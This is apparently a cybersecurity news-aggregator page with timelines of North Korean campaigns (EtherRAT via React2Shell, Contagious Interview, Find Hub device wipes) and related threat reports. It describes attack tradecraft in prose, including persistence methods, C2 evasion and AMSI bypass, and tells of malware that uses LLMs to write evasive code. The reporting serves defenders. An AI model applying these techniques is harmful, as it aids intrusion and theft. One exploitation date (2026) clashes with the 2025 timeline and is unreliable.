CyberHappenings logo
Home Browse About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Scarcruft (APT37) Ransomware Campaign Targets South Korea

First reported
Last updated
5 unique sources, 16 articles

Summary

Hide ▲

North Korean threat actors have rapidly weaponized the **React2Shell (CVE-2025-55182)** vulnerability to deploy **EtherRAT**, a sophisticated Linux malware implant that leverages **Ethereum smart contracts for resilient C2 communication**. Discovered in December 2025, EtherRAT employs a **consensus-based voting mechanism** across nine public Ethereum RPC endpoints to resist sinkholing, alongside **five redundant persistence methods** (systemd, XDG autostart, cron jobs, bashrc/profile injection) and a **self-updating capability** that fetches obfuscated replacement code to evade static detection. The malware’s encrypted loader pattern closely mirrors **BeaverTail**, reinforcing its ties to the **Contagious Interview campaign**, which has now expanded to exploit **VS Code’s auto-run tasks.json** via malicious GitHub repositories. This campaign continues a broader pattern of North Korean APT groups—including **Scarcruft (APT37)**, **Konni**, and **BlueNoroff (Lazarus subgroup)**—targeting South Korea and global cryptocurrency sectors with multi-stage attacks. Earlier efforts combined **spear-phishing (Operation HanKook Phantom)**, **social engineering via KakaoTalk**, and **destructive operations** like remote Android device wipes via Google’s Find Hub. The integration of **React2Shell exploitation** into EtherRAT underscores the group’s agility in weaponizing zero-day flaws, while its overlap with **EtherHiding** and **fake recruitment campaigns (GhostCall/GhostHire)** highlights a strategic focus on **credential theft, cryptocurrency heists, and persistent access** to high-value targets.

Timeline

  1. 10.11.2025 22:29 4 articles · 29d ago

    Konni Exploits Google's Find Hub for Remote Data Wiping

    North Korean threat actors, including Konni APT (APT37/Kimsuky), have weaponized Google’s Find Hub service to remotely reset Android devices in South Korea, marking the first confirmed instance of a nation-state APT abusing this feature for destructive operations. The campaign, discovered in November 2025, involves a two-stage attack: initial spear-phishing (since July 2024) targeting Android devices via spoofed entities (e.g., National Tax Service), followed by secondary malware distribution through compromised KakaoTalk PC sessions. Attackers compromised the account of a psychological counselor for North Korean defectors on September 5, 2025, using it to distribute a digitally signed MSI installer ('Stress Clear.msi') disguised as a stress-relief program. The installer deployed AutoIt loaders that established persistence via scheduled tasks and C2 communication, fetching RATs like RemcosRAT, QuasarRAT, and RftRAT. Using stolen Google credentials, attackers tracked victim locations via Find Hub and triggered remote wipes when targets were away, delaying discovery and severing communication channels. The attack chain also involved prolonged internal reconnaissance, exfiltration of PII and webcam captures, and exploitation of Find Hub’s location tracking to execute remote resets. This tactic combines device sabotage, credential theft, and social engineering to erase forensic evidence and amplify the campaign’s reach through trusted contacts. The MSI installer’s setup routine deleted traces to hinder analysis, while AutoIt scripts maintained continuous C2 communication.

    Show sources
    Open in new tab
  2. 25.09.2025 16:14 8 articles · 2mo ago

    North Korean Threat Actors Launch Contagious Interview Campaign

    The **Contagious Interview campaign**, attributed to North Korean actors including **Lazarus/BlueNoroff**, has expanded with the discovery of **EtherRAT**, a new Linux malware implant exploiting the **React2Shell (CVE-2025-55182)** vulnerability in Next.js applications. Deployed in December 2025, EtherRAT leverages **Ethereum smart contracts for C2 communication**, querying **nine public RPC providers in parallel** via a **consensus voting mechanism** to resist sinkholing. It employs **five redundant persistence mechanisms** (cron jobs, bashrc injection, XDG autostart, systemd, profile injection) and a **self-updating capability**—fetching obfuscated replacement code via API—to evade static detection. Its **encrypted loader pattern** closely resembles the **BeaverTail malware** used in earlier Contagious Interview operations. The campaign continues to target **Web3/cryptocurrency developers** and **global tech sectors** with fake job offers, malicious packages (npm/PyPI/RubyGems), and multi-stage payloads (e.g., **JADESNOW, InvisibleFerret**). EtherRAT’s rapid deployment—**within 48 hours of CVE-2025-55182’s disclosure**—demonstrates the group’s agility in weaponizing zero-day flaws. Recent adaptations include **VS Code auto-run tasks.json abuse** via malicious GitHub repositories, with **13 campaign variants** identified across **27 GitHub users** since April 2025. The shift to **Vercel-exclusive hosting** and abandonment of prior providers (Fly.io, Platform.sh) underscores operational refinement. Prior iterations used **EtherHiding** (smart contract-hosted payloads) and **Discord webhooks for exfiltration**, with over **338 malicious packages** published and **50,000+ downloads** across ecosystems. The campaign’s **cross-platform scope** (Windows/macOS/Linux) and **collaboration with North Korea’s fraudulent IT workers (WageMole)** highlight its dual role in **espionage** and **financial theft**.

    Show sources
    Open in new tab
  3. 10.09.2025 16:04 1 articles · 3mo ago

    ZynorRAT RAT Targets Windows, Linux, and macOS Systems

    A new malware family, ZynorRAT, has been discovered, targeting Windows, Linux, and macOS systems. ZynorRAT is a Go-based remote access trojan that uses a Telegram bot for command and control. The malware supports a wide range of functions, including file exfiltration, system enumeration, screenshot capture, and arbitrary command execution. The Windows version of ZynorRAT is near-identical to its Linux counterpart, indicating ongoing development. ZynorRAT is believed to be the work of a lone actor possibly of Turkish origin.

    Show sources
    Open in new tab
  4. 10.09.2025 14:59 2 articles · 3mo ago

    ChillyHell macOS Backdoor Resurfaces with New Version

    ChillyHell is written in C++ and developed for Intel architectures. The malware is attributed to an uncategorized threat cluster dubbed UNC4487, active since at least October 2022. UNC4487 is a suspected espionage actor that has compromised Ukrainian government websites to deploy ChillyHell. The malware establishes persistence using LaunchAgent, LaunchDaemon, and modifying the user's shell profile. It uses timestomping to modify file timestamps to evade detection. ChillyHell supports commands to launch a reverse shell, download new versions, fetch additional payloads, enumerate user accounts, and conduct brute-force attacks. The malware was notarized by Apple, highlighting that not all malicious code comes unsigned.

    Show sources
    Open in new tab
  5. 01.09.2025 11:26 1 articles · 3mo ago

    Scarcruft (APT37) Launches Operation HanKook Phantom Targeting South Korean Academics

    In September 2025, a new phishing campaign, Operation HanKook Phantom, was discovered. This campaign targets individuals associated with the National Intelligence Research Association, including academic figures, former government officials, and researchers. The campaign uses spear-phishing emails with a lure for a "National Intelligence Research Society Newsletter" containing a ZIP archive attachment with a Windows shortcut (LNK) masquerading as a PDF document. The LNK file drops RokRAT malware, which is capable of collecting system information, executing arbitrary commands, enumerating the file system, capturing screenshots, and downloading additional payloads. RokRAT exfiltrates data via Dropbox, Google Cloud, pCloud, and Yandex Cloud. The campaign also involves a PowerShell script that deploys a dropper, which then runs a next-stage payload to steal sensitive data while concealing network traffic as a Chrome file upload. The lure document used in this instance is a statement issued by Kim Yo Jong, the Deputy Director of the Publicity and Information Department of the Workers' Party of Korea, rejecting Seoul's efforts at reconciliation.

    Show sources
    Open in new tab
  6. 14.08.2025 03:00 2 articles · 3mo ago

    Scarcruft (APT37) Launches Ransomware Campaign Targeting South Korea

    In July 2025, the North Korean threat group Scarcruft (APT37) initiated a new campaign targeting South Korea with a combination of infostealers, backdoors, and ransomware. The campaign, dubbed ChinopuNK, includes multiple malware tools designed for espionage and financial gain. The attacks start with phishing emails containing decoy documents about postal code updates. Once opened, these documents download NubSpy, a backdoor that uses the PubNub cloud service for command-and-control (C2) communication. The group also deploys ChillyChino, a PowerShell backdoor rewritten in Rust, and VCD ransomware, which encrypts specific file paths tailored to individual targets. The campaign is notable for its use of ransomware by a nation-state actor, combining espionage with financial and psychological pressure tactics.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Chinese Hackers Exploit React2Shell Vulnerability (CVE-2025-55182) in Targeted Campaigns

Two China-linked hacking groups, Earth Lamia and Jackpot Panda, have begun exploiting the newly disclosed React2Shell vulnerability (CVE-2025-55182) in React Server Components, which allows unauthenticated remote code execution. The vulnerability was addressed in React versions 19.0.1, 19.1.2, and 19.2.1. The groups have targeted various sectors, including financial services, logistics, retail, IT, universities, and government organizations across Latin America, the Middle East, and Southeast Asia. The attacks involve running discovery commands, writing files, and reading sensitive information, demonstrating a systematic approach to exploit multiple vulnerabilities simultaneously.

Open in new tab

Critical React Server Components (RSC) Bugs Enable Unauthenticated Remote Code Execution

A critical security vulnerability (CVE-2025-55182, CVSS 10.0) in React Server Components (RSC) allows unauthenticated remote code execution due to unsafe deserialization of payloads. The flaw affects multiple versions of React and Next.js, potentially impacting any application using RSC. The issue has been patched, but 39% of cloud environments remain vulnerable. Cloudflare experienced a widespread outage due to an emergency patch for this vulnerability, and multiple China-linked hacking groups have begun exploiting it. NHS England National CSOC has warned of the likelihood of continued exploitation in the wild. Major companies such as Google Cloud, AWS, and Cloudflare immediately responded to the vulnerability. The security researcher Lachlan Davidson disclosed the vulnerability on November 29, 2025, to the Meta team. The flaw has been dubbed React2Shell, a nod to the Log4Shell vulnerability discovered in 2021. The US National Vulnerability Database (NVD) rejected CVE-2025-66478 as a duplicate of CVE-2025-55182. Exploitation success rate is reported to be nearly 100% in default configurations. React servers that use React Server Function endpoints are known to be vulnerable. The Next.js web application is also vulnerable in its default configuration. At the time of writing, it is unknown if active exploitation has occurred, but there have been some reports of observed exploitation activity as of December 5, 2026. OX Security warned that the flaw is now actively exploitable on December 5, around 10am GMT. Hacker maple3142 published a working PoC, and OX Security successfully verified it. JFrog identified fake proof-of-concepts (PoC) on GitHub, warning security teams to verify sources before testing. Cloudflare started investigating issues on December 5 at 08:56 UTC, and a fix was rolled out within half an hour, but by that time outages had been reported by several major internet services, including Zoom, LinkedIn, Coinbase, DoorDash, and Canva. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog on December 6, 2025, following confirmed active exploitation. The vulnerability is tracked as React2Shell and is related to a remote code execution flaw in React Server Components (RSC). The flaw is due to insecure deserialization in the Flight protocol used by React to communicate between a server and client. The vulnerability affects versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Patched versions of React are 19.0.1, 19.1.2, and 19.2.1. Downstream frameworks impacted include Next.js, React Router, Waku, Parcel, Vite, and RedwoodSDK. Amazon reported attack attempts from Chinese hacking groups like Earth Lamia and Jackpot Panda within hours of public disclosure. Coalition, Fastly, GreyNoise, VulnCheck, and Wiz reported seeing exploitation efforts targeting the flaw. Some attacks involved the deployment of cryptocurrency miners and the execution of "cheap math" PowerShell commands. Censys identified about 2.15 million instances of internet-facing services potentially affected by the vulnerability. Palo Alto Networks Unit 42 confirmed over 30 affected organizations across numerous sectors, with activity consistent with Chinese hacking group UNC5174. Security researcher Lachlan Davidson released multiple proof-of-concept (PoC) exploits for the vulnerability. Another working PoC was published by a Taiwanese researcher with the GitHub handle maple3142. Federal Civilian Executive Branch (FCEB) agencies have until December 26, 2025, to apply the necessary updates to secure their networks. Over 77,000 Internet-exposed IP addresses are vulnerable to the critical React2Shell remote code execution flaw (CVE-2025-55182). Researchers have confirmed that attackers have already compromised over 30 organizations across multiple sectors using the React2Shell flaw. Shadowserver detected 77,664 IP addresses vulnerable to the React2Shell flaw, with approximately 23,700 in the United States. GreyNoise recorded 181 distinct IP addresses attempting to exploit the flaw over the past 24 hours, with most of the traffic appearing automated. Attackers frequently begin with PowerShell commands that perform a basic math function to confirm the device is vulnerable to the remote code execution flaw. Once remote code execution was confirmed, attackers were seen executing base64-encoded PowerShell commands that download additional scripts directly into memory. One observed command executes a second-stage PowerShell script from the external site (23[.]235[.]188[.]3), which is used to disable AMSI to bypass endpoint security and deploy additional payloads. The PowerShell script observed by GreyNoise installs a Cobalt Strike beacon on the targeted device, giving threat actors a foothold on the network. Amazon AWS threat intelligence teams saw rapid exploitation hours after the disclosure of the React CVE-2025-55182 flaw, with infrastructure associated with China-linked APT hacking groups known as Earth Lamia and Jackpot Panda. Palo Alto Networks observed similar exploitation, attributing some of it to UNC5174, a Chinese state-sponsored threat actor believed to be tied to the Chinese Ministry of State Security. The deployed malware in these attacks includes Snowlight and Vshell, both commonly used by Chinese hacking groups for remote access, post-exploitation activity, and to move laterally through a compromised network. Earth Lamia is known for exploiting web application vulnerabilities to target organizations across Latin America, the Middle East, and Southeast Asia. Earth Lamia has historically targeted sectors across financial services, logistics, retail, IT companies, universities, and government organizations. Jackpot Panda primarily targets entities in East and Southeast Asia. The Shadowserver Foundation has identified over 77,000 vulnerable IPs following a scan of exposed HTTP services across a wide variety of exposed edge devices and other applications. Censys observed just over 2.15 million instances of internet-facing services that may be affected by this vulnerability, including exposed web services using React Server Components and exposed instances of frameworks such as Next.js, Waku, React Router, and RedwoodSDK. The bug is a pre-authentication remote code execution (RCE) vulnerability which exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0. React issued a security advisory with the relevant patches and updates on December 3. Any internet-accessible server running the affected React Server Components code should be assumed vulnerable until updated as a precaution. AWS observed that many threat actors are attempting to use public PoCs that don’t work in real-world scenarios. AWS noted that the use of these PoCs shows that threat actors prioritize rapid operationalization over thorough testing, attempting to exploit targets with any available tool. Using multiple PoCs to scan for vulnerable environments also gives threat actors a higher chance of identifying vulnerable configurations, even if the PoCs are non-functional. The availability of the PoCs also allows less sophisticated actors to participate in exploitation campaigns. Finally, AWS noted that even failed exploitation attempts create significant noise in logs, potentially masking more sophisticated attacks. The invalid PoCs can give developers a false sense of security when testing for React2Shell. The Shadowserver Foundation detected 28,964 IP addresses vulnerable to the React2Shell flaw as of December 7, 2025, down from 77,664 on December 5, with approximately 10,100 located in the U.S., 3,200 in Germany, and 1,690 in China.

Open in new tab

APT24 Utilizes BadAudio Malware in Multi-Year Espionage Campaign

APT24, a China-linked threat group, has been using previously undocumented BadAudio malware in a nearly three-year espionage campaign targeting Windows systems. The campaign, active since November 2022, employed various attack methods including spearphishing, supply-chain compromise, and watering hole attacks. The malware is heavily obfuscated and uses sophisticated techniques to evade detection and hinder analysis. From November 2022 to at least September 2025, APT24 compromised over 20 legitimate websites to inject malicious JavaScript code, targeting specific visitors. Starting July 2024, the group compromised a Taiwanese digital marketing company, injecting malicious JavaScript into widely used libraries, affecting over 1,000 domains. Additionally, APT24 launched spearphishing operations using emails impersonating animal rescue organizations and leveraging cloud services for malware distribution. The BadAudio malware collects system details, communicates with a hard-coded C2 server, and executes payloads in memory using DLL sideloading. Despite its prolonged use, the malware remained largely undetected, with only a few samples flagged by antivirus engines. APT24 has been active since at least 2008, targeting various sectors including government, healthcare, construction, and telecommunications. The group is closely related to the Earth Aughisky group, which has also deployed Taidoor and Specas malware.

Open in new tab

Landfall Android Spyware Exploits Samsung Zero-Day via WhatsApp

The Landfall Android spyware targeted Samsung devices through a zero-day vulnerability (CVE-2025-21042) in a Samsung image processing library. The exploit was delivered via a malicious DNG image sent through WhatsApp, affecting Samsung Galaxy S22, S23, S24, Z Fold4, and Z Flip4 phones. The spyware enables microphone recording, location tracking, and data exfiltration. The attacks have been ongoing since at least July 2024, and the vulnerability was patched by Samsung in April. The threat actor, tracked as CL-UNK-1054, remains unidentified, with potential links to the Stealth Falcon group and other surveillance vendors. The attacks primarily targeted individuals in the Middle East and North Africa. The exploit involved a zero-click approach, and the malicious DNG files contained an embedded ZIP file with a shared object library to run the spyware. The spyware manipulated the device's SELinux policy to gain elevated permissions and facilitate persistence, and communicated with a command-and-control (C2) server over HTTPS for beaconing and receiving next-stage payloads. The spyware can fingerprint devices based on hardware and SIM IDs and targets a broad range of Samsung’s latest flagship models, excluding the latest S25 series devices. Unit 42 identified six C2 servers linked to the LandFall campaign, with some flagged by Turkey’s CERT. C2 domain registration and infrastructure patterns share similarities with those seen in Stealth Falcon operations, originating from the United Arab Emirates. CISA has added CVE-2025-21042 to its Known Exploited Vulnerabilities catalog, ordering federal agencies to patch within three weeks.

Open in new tab

AI-Powered Malware Families Deployed in the Wild

Google's Threat Intelligence Group (GTIG) has identified new malware families that leverage artificial intelligence (AI) and large language models (LLMs) for dynamic self-modification during execution. These malware families, including PromptFlux, PromptSteal, FruitShell, QuietVault, and PromptLock, demonstrate advanced capabilities for evading detection and maintaining persistence. PromptFlux, an experimental VBScript dropper, uses Google's LLM Gemini to generate obfuscated VBScript variants and evade antivirus software. It attempts persistence via Startup folder entries and spreads laterally on removable drives and mapped network shares. The malware is under development or testing phase and is assessed to be financially motivated. PromptSteal is a data miner written in Python that queries the LLM Qwen2.5-Coder-32B-Instruct to generate one-line Windows commands to collect information and documents in specific folders and send the data to a command-and-control (C2) server. It is used by the Russian state-sponsored actor APT28 in attacks targeting Ukraine. The use of AI in malware enables adversaries to create more versatile and adaptive threats, posing significant challenges for cybersecurity defenses. Various threat actors, including those from China, Iran, and North Korea, have been observed abusing AI models like Gemini across different stages of the attack lifecycle. The underground market for AI-powered cybercrime tools is also growing, with offerings ranging from deepfake generation to malware development and vulnerability exploitation.

Open in new tab